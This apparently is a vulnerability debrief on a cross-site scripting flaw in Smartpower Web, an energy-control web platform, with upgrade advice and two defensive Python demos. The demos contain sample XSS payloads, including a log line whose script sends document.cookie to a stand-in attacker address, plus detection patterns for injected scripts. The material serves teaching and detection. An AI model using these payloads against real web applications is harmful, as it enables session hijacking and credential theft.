PatchSiren

PatchSiren cyber security CVE debrief

CVE-2022-45086 Group Arge Energy and Control Systems CVE debrief

A Cross-Site Scripting (XSS) vulnerability, stored or reflected, exists in Group Arge Energy and Control Systems Smartpower Web prior to version 23.01.01. The flaw stems from improper neutralization of user-supplied input during web page generation (CWE-79): an attacker holding a low-privileged account can inject script that executes in another user's browser session. The CVSS 3.1 vector (AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N, base score 5.4) indicates network attack vector, low attack complexity, low privileges required, user interaction required (the victim must view the injected content or follow a crafted link), changed scope (the script runs in the victim's browser, outside the security authority of the vulnerable web component), and low confidentiality and integrity impact with no availability impact. NVD published the vulnerability on 2023-02-12 and last modified it on 2026-05-18. No exploitation in ransomware campaigns has been documented, and the vulnerability is not listed in CISA KEV.

Vendor: Group Arge Energy and Control Systems
Product: Smartpower Web
CVSS: MEDIUM 5.4
CISA KEV: Not listed in stored evidence
Original CVE published: 2023-02-12
Original CVE updated: 2026-05-18
Advisory published: 2023-02-12
Advisory updated: 2026-05-18

Who should care

Organizations running Smartpower Web for energy monitoring and control, particularly in critical infrastructure and other industrial control environments. Security teams responsible for OT/ICS web application security, and compliance staff addressing energy-sector cybersecurity frameworks.

Technical summary

Smartpower Web, an energy and control systems management platform by Group Arge (Gruparge), contains an improper input neutralization flaw (CWE-79) that enables cross-site scripting. All versions prior to 23.01.01 are affected. Exploitation requires a low-privileged authenticated account (PR:L) and a victim who views the injected content (UI:R); in practice the attacker enters script into a field that a more privileged user later has rendered in their browser. Script running in the victim's session can read what that user can see and act with that user's rights, which is where the session hijacking, credential theft and unauthorized actions come from, bounded by the low confidentiality and integrity impact the vector assigns. The scope change (S:C) records that the component actually affected is the victim's browser rather than the vulnerable web server itself.
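The fix for CWE-79 is contextual output encoding at the point where user-controlled text is written into a page. The Python below is an illustration added to this debrief; it is not Smartpower Web code (the advisory does not say what the product is written in) and the payload string is constructed for the demo. It shows the unsafe splice beside encoders for the three contexts that matter most, including the inline-JavaScript case where HTML entity encoding alone would be wrong.

```python
import html
import json

# Constructed attacker input for the demo (not a payload taken from the advisory):
# it closes the surrounding attribute quote and tries to open its own <script> tag.
PAYLOAD = '"><script>alert(document.cookie)</script>'


def render_unsafe(display_name: str) -> str:
    """The CWE-79 pattern: user-controlled text spliced into markup unencoded."""
    return f'<input name="display_name" value="{display_name}">'


def render_text(display_name: str) -> str:
    """HTML text context: entity-encode & < > " ' so the value can never open a tag."""
    return f"<td>{html.escape(display_name, quote=True)}</td>"


def render_attr(display_name: str) -> str:
    """Quoted attribute context: same entity encoding, and the attribute must be quoted,
    otherwise a space in the value would start a new attribute such as onerror=..."""
    return f'<input name="display_name" value="{html.escape(display_name, quote=True)}">'


def to_js_string(value: str) -> str:
    """JavaScript string-literal context: JSON-encode, then hex-escape < > & so a value
    containing '</script>' cannot terminate the enclosing <script> block. The browser's
    JS parser turns \\u003c back into '<' inside the string, so the data is unchanged."""
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )


def render_js(display_name: str) -> str:
    """Embeds the value in an inline script; the wrapper's own <script> tag is expected."""
    return f"<script>var displayName = {to_js_string(display_name)};</script>"


def script_tags(rendered: str) -> int:
    """Counts '<script' occurrences: anything beyond the template's own tags is an injection."""
    return rendered.lower().count("<script")


if __name__ == "__main__":
    for name, fn in [("unsafe", render_unsafe), ("text", render_text),
                     ("attr", render_attr), ("js", render_js)]:
        out = fn(PAYLOAD)
        print(f"{name:6s} script tags={script_tags(out)}  {out}")
```

The unsafe renderer produces a second, attacker-controlled script tag; the three encoders produce none, and the JavaScript encoder still hands the browser the original string once the JS parser decodes the escapes. Input sanitization (stripping `<script>` on the way in) is not a substitute, because the same stored value may be rendered in all three contexts.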

Defensive priority

Medium

Recommended defensive actions

  • Upgrade Smartpower Web to version 23.01.01 or later, and confirm the running version afterwards; the affected range is everything below 23.01.01 (versionEndExcluding).
  • Deploy a Content Security Policy to limit the impact of any residual XSS vector. Start with Content-Security-Policy-Report-Only and collect violation reports before enforcing, because legacy OT web interfaces often depend on inline scripts that a strict policy would block.
  • Because exploitation needs only a low-privileged account (PR:L), audit Smartpower Web accounts: remove dormant and shared accounts, and restrict which roles can enter free-text values that other users will later view.
  • Where your own portals or dashboards re-render data taken from Smartpower Web (user-entered fields in particular), apply contextual output encoding rather than relying on input sanitization alone, per the OWASP XSS Prevention Cheat Sheet.
  • Review web server and reverse-proxy logs for script-like payloads (`<script`, `onerror=`, `javascript:`, including URL- and double-encoded forms) in requests from low-privileged accounts, and alert on CSP violation reports once a policy is in place. Payloads submitted in POST bodies do not appear in standard access logs, so pair this with application-level logging where available.
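A log review of the kind the last two actions describe, as an example added to this debrief (not tooling from PatchSiren, Group Arge or the advisory). The sample lines are constructed in Apache/nginx combined format, since the product's own log format is not given; the regex and indicator list are a starting point to tune, not a WAF. The third sample line carries a double URL-encoded payload to show why a single decoding pass is not enough, and the POST line shows the blind spot: a stored payload sent in a request body leaves no trace here.

```python
import html
import re
import urllib.parse
from collections import Counter
from dataclasses import dataclass

# Constructed access-log lines in Apache/nginx "combined" format, written for this demo.
# They are NOT Smartpower Web logs; the product's log format is not given in the advisory.
# 198.51.100.9 is a documentation address standing in for an attacker-controlled host.
SAMPLE_LOG = """\
10.0.5.21 - operator1 [12/Feb/2023:10:01:07 +0300] "GET /reports/view?title=Daily%20load HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.5.40 - viewer7 [12/Feb/2023:10:02:11 +0300] "GET /devices/edit?name=%3Cscript%3Efetch('http://198.51.100.9/c?'%2Bdocument.cookie)%3C/script%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.5.40 - viewer7 [12/Feb/2023:10:02:45 +0300] "GET /devices/edit?name=%2522%253E%253Cimg%2520src%253Dx%2520onerror%253Dalert(1)%253E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
10.0.5.40 - viewer7 [12/Feb/2023:10:03:02 +0300] "POST /devices/save HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.5.21 - operator1 [12/Feb/2023:10:05:19 +0300] "GET /search?q=javascript%3Aalert(1) HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Indicators are matched against the decoded, lower-cased request target.
# The event-handler list is deliberately explicit to avoid matching words like "online=".
XSS_PATTERNS = [
    ("script_tag", re.compile(r"<\s*script\b")),
    ("event_handler", re.compile(r"\bon(?:error|load|click|mouseover|focus|blur|input)\s*=")),
    ("javascript_uri", re.compile(r"javascript\s*:")),
    ("html_tag", re.compile(r"<\s*(?:img|svg|iframe|object|embed)\b")),
]


@dataclass
class Finding:
    ip: str
    user: str
    ts: str
    method: str
    target: str
    indicators: list


def normalize(target: str) -> str:
    """Undo up to three layers of URL encoding, then HTML entities, then lower-case.
    This is detection normalization, not payload reconstruction: a literal '+' that
    appears after the first pass is also turned into a space, which is harmless here."""
    decoded = target
    for _ in range(3):
        step = urllib.parse.unquote_plus(decoded)
        if step == decoded:
            break
        decoded = step
    return html.unescape(decoded).lower()


def scan_line(line: str):
    """Returns a Finding for a request target carrying XSS indicators, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    normalized = normalize(m["target"])
    hits = [name for name, pat in XSS_PATTERNS if pat.search(normalized)]
    if not hits:
        return None
    return Finding(m["ip"], m["user"], m["ts"], m["method"], m["target"], hits)


def scan_log(text: str) -> list:
    return [f for f in (scan_line(line) for line in text.splitlines()) if f is not None]


def findings_by_user(findings) -> Counter:
    """Accounts with repeated hits are the low-privileged (PR:L) attacker this CVE describes."""
    return Counter(f.user for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f.ts}  {f.user:10s} {f.ip:12s} {','.join(f.indicators):24s} {f.target}")
    print("per user:", dict(findings_by_user(found)))
```

On the sample, the scan flags three GET requests (two from viewer7, one from operator1) and says nothing about the POST, which is exactly the gap the last recommended action warns about. In a real review, feed the output into whatever tracks account activity so that a flagged low-privileged user can be correlated with which higher-privileged users subsequently opened the affected page.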

Evidence notes

CWE-79 confirmed by both USOM (secondary) and NVD (primary). Affected versions confirmed via CPE criteria: cpe:2.3:a:gruparge:smartpower_web:*:*:*:*:*:*:*:* with versionEndExcluding 23.01.01. Advisory sources from Turkish National Cyber Security Incident Response Center (USOM) and Turkish Cyber Security Directorate.

Official resources

2023-02-12